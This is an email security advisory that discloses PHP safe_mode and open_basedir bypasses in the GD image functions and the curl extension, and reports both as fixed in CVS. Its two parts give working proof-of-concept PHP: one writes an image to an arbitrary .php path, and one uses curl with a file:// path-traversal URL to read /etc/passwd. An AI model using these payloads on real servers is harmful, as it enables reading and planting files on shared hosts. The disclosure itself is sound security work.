A safedir restriction bypass has been identified within the GD PHP extension.
04877c12726507f2e9d95fec9a729d814580a93f4a4c8c1aae7edd854d6e6ebe
------=_Part_12857_14117620.1129582526565
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
There is a vulnerability (Safedir Restriction Bypass) identified within the
GD extension affecting
the following functions:
- imagegif()
- imagepng()
- imagejpeg()
in /ext/gd/gd.c line 1647
Which is now fixed in the cvs
http://cvs.php.net/co.php/php-src/ext/gd/gd.c?r=3D1.312.2.1#1786
POC:
with an image like http://81.57.125.106/~slythers/file.gif
<?php
$im =3D imagecreatefromgif("file.gif");
imagegif($im, '/var/www/f34r.fr/c/f/elbossoso/.i.need.money.php');
?>
curl openbasedir and safemode bypass.
POC:
<?php
mkdir("./".$_SERVER["SCRIPT_NAME"]."?");
$ch =3D curl_init("
file://".$_SERVER["SCRIPT_FILENAME"]."?/../../../../../../../../../../../et=
c/passwd
");
$file=3Dcurl_exec($ch);
echo $file;
?>
As you notice, we can bypass the safedir which leads to access to any
files on any shared servers.
This is fixed in the cvs.
slythers@gmail.com
greets: david coallier <davidc@php.net>
------=_Part_12857_14117620.1129582526565
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
<div>There is a vulnerability (Safedir Restriction Bypass) identified =
within the GD extension affecting<br>the following functions:<br>- imagegif=
()<br>- imagepng()<br>- imagejpeg()<br><br>in /ext/gd/gd.c line 1647<=
br><br>
Which is now fixed in the cvs<br><span class=3D"q"><a onclick=3D"return top=
.js.OpenExtLink(window,event,this)" href=3D"http://cvs.php.net/co.php/php-s=
rc/ext/gd/gd.c?r=3D1.312.2.1#1786" target=3D"_blank">http://cvs.php.net/co.=
php/php-src/ext/gd/gd.c?r=3D1.312.2.1#1786
</a><br></span><span class=3D"q">POC:</span></div>
<div><span class=3D"q"><br></span><span></span>with an image like <a onclic=
k=3D"return top.js.OpenExtLink(window,event,this)" href=3D"http://81.57.125=
.106/~slythers/file.gif" target=3D"_blank">http://81.57.125.106/~slythers/f=
ile.gif
</a><br><?php<br><span class=3D"q"> $im =3D imagecreatefrom=
gif("file.gif");<br> imagegif($im, '/var/www/f34r.fr=
/c/f/elbossoso/.i.need.money.php');<br>?><br><br><br></span>curl openbas=
edir and safemode bypass.
<br><span class=3D"q">POC:</span></div><span class=3D"q">
<div><br></div></span><span>
<p><?php</p>
<p>mkdir("./".$_SERVER["SCRIPT_NAME"]."?");<b=
r>$ch =3D curl_init("<a href=3D"file://".$_SERVER["SCRIPT_FI=
LENAME"]."?/../../../../../../../../../../../etc/passwd">file://&=
quot;.$_SERVER["SCRIPT_FILENAME"]."?/../../../../../../../..=
/../../../etc/passwd
</a>");</p>
<p>$file=3Dcurl_exec($ch);</p>
<p>echo $file;</p>
<p>?></p></span>
<div>As you notice, we can bypass the <span class=3D"st0" id=3D"st" name=3D=
"st">safedir</span> which leads to access to any<br>files on any shared ser=
vers.<br><br>This is fixed in the cvs.<br> </div>
<div><a href=3D"mailto:slythers@gmail.com">slythers@gmail.com</a></div>
<div>greets: david coallier <<a href=3D"mailto:davidc@php.net">davidc@ph=
p.net</a>></div>
------=_Part_12857_14117620.1129582526565--